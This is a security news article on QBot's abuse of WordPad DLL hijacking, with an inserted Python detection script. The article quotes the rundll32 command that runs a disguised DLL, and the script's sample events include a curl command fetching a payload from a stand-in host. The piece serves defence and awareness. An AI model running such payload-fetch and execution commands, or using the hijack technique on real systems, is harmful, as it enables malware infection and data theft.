QBot malware abuses Windows WordPad EXE to infect devices

The QBot malware campaign has begun infecting PCs by exploiting a DLL hijacking flaw in the Windows 10 WordPad application, using the legitimate program to evade detection by security tools.

A DLL is a library file containing functions that can be used by more than one program at the same time. When an application is launched, it will attempt to load any required DLLs.

It does this by searching specific Windows folders for the DLL and loading it when found. However, Windows applications give priority to DLLs in the same folder as the executable, loading them before any others.

DLL hijacking is when a threat actor creates a malicious DLL with the same name as a legitimate one and places it early in the Windows search path, usually in the same folder as the executable. When that executable runs, it loads the malicious DLL instead of the legitimate one and executes whatever malicious code it contains.

QBot abuses WordPad DLL hijacking flaw

QBot, also known as Qakbot, is Windows malware that started as a banking trojan but evolved into a malware dropper. Ransomware gangs have collaborated with the malware operation to gain access to business networks.

This QBot phishing campaign began abusing a DLL hijacking vulnerability in write.exe, the executable used to launch WordPad in Windows.

The original phishing emails contain a link to download a file.

When the recipient clicks the link, a ZIP archive with a random name is downloaded from a remote host.

This ZIP file contains two files:

document.exe (the Windows 10 WordPad executable)

a DLL file named edputil.dll (used for the DLL hijack).

[Image: Contents of the downloaded ZIP file. Source: BleepingComputer]

You can see from the properties of the document.exe file that it is a renamed copy of the legitimate WordPad editor.

[Image: Renamed Windows 10 WordPad executable. Source: BleepingComputer]

When document.exe is launched, it attempts to load a legitimate DLL called edputil.dll, which is located in the C:\Windows\System32 folder.

However, the executable does not look for edputil.dll in a specific folder; it loads any DLL of that name found in the same folder as document.exe.

This enables threat actors to perform DLL hijacking by building a malicious version of edputil.dll and storing it in the same folder as document.exe, so it is loaded instead of the legitimate one.

Once the DLL is loaded, the malware uses C:\Windows\system32\curl.exe to download a file from a remote host: a DLL disguised as a PNG image.

This PNG file (actually a DLL) is then executed using rundll32.exe with the following command:

rundll32 c:\users\public\default.png,print

QBot will now run in the background, stealing emails for use in further phishing attacks. It may also download other payloads, such as Cobalt Strike.

The compromised device is then used as a foothold to spread through the network, leading to corporate data theft and ransomware attacks.

Security software will not detect QBot as harmful, because most security software knows wordpad.exe is a safe file.
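The chain above (a system DLL loaded from the executable's own folder, WordPad spawning curl.exe, and rundll32 loading a ".png") is what a defender can alert on even though the executable itself is trusted. The following is an added example, not code from the article or from any vendor: a small Python detector run over constructed Sysmon-style events; the field names, the curl command line and the parent_orig_name enrichment field are assumptions.

```python
from pathlib import PureWindowsPath

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SIDELOAD_DLLS = {"edputil.dll"}  # DLL named in the article; extend from your own telemetry

# Constructed events in a Sysmon-like shape (ImageLoad / ProcessCreate); not real telemetry.
EVENTS = [
    {"type": "ImageLoad", "process": r"C:\Users\victim\Downloads\document.exe",
     "image": r"C:\Users\victim\Downloads\edputil.dll"},
    {"type": "ProcessCreate", "parent_orig_name": "wordpad.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o c:\users\public\default.png http://remote-host.invalid/x"},
    {"type": "ProcessCreate", "parent_orig_name": "wordpad.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32 c:\users\public\default.png,print"},
    {"type": "ImageLoad", "process": r"C:\Program Files\Windows NT\Accessories\wordpad.exe",
     "image": r"C:\Windows\System32\edputil.dll"},  # benign: loaded from System32
]

def _dir(p): return str(PureWindowsPath(p).parent).lower()
def _name(p): return PureWindowsPath(p).name.lower()

def sideloaded_dll(ev):
    """A known system DLL loaded from the executable's own directory rather than a system dir."""
    if ev["type"] != "ImageLoad" or _name(ev["image"]) not in SIDELOAD_DLLS:
        return False
    return _dir(ev["image"]) not in SYSTEM_DIRS and _dir(ev["image"]) == _dir(ev["process"])

def rundll32_non_dll(ev):
    """rundll32 asked to load a module whose extension is not .dll (here a .png)."""
    if ev["type"] != "ProcessCreate" or _name(ev["image"]) != "rundll32.exe":
        return False
    parts = ev["cmdline"].split(None, 1)
    if len(parts) < 2:
        return False
    module = parts[1].split(",", 1)[0].strip().strip('"')
    return PureWindowsPath(module).suffix.lower() != ".dll"

def wordpad_spawns_tool(ev):
    """WordPad (matched by original file name, so renaming to document.exe does not help) spawning curl/rundll32."""
    return (ev["type"] == "ProcessCreate"
            and ev.get("parent_orig_name", "").lower() == "wordpad.exe"
            and _name(ev["image"]) in {"curl.exe", "rundll32.exe"})

RULES = {"sideloaded_dll": sideloaded_dll, "rundll32_non_dll": rundll32_non_dll,
         "wordpad_spawns_tool": wordpad_spawns_tool}

def detect(events):
    """Return (event_index, rule_name) pairs for every event that trips a rule."""
    return [(i, n) for i, ev in enumerate(events) for n, rule in RULES.items() if rule(ev)]

if __name__ == "__main__":
    for i, rule in detect(EVENTS):
        print(f"event {i}: {rule} -> {EVENTS[i]['image']}")
```

rundll32 also legitimately loads modules such as .cpl files, so the second rule is a starting point that needs an allowlist in production.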

However, since the infection relies on curl.exe, this method only works on Windows 10 and later, as earlier versions of Windows do not include the Curl program.

For the most part, this should not be an issue, as older versions of Windows have been phased out after reaching end of support.

The QBot operation has since moved on to other infection methods in recent weeks, but it is not uncommon for them to return to previous tactics in later campaigns.
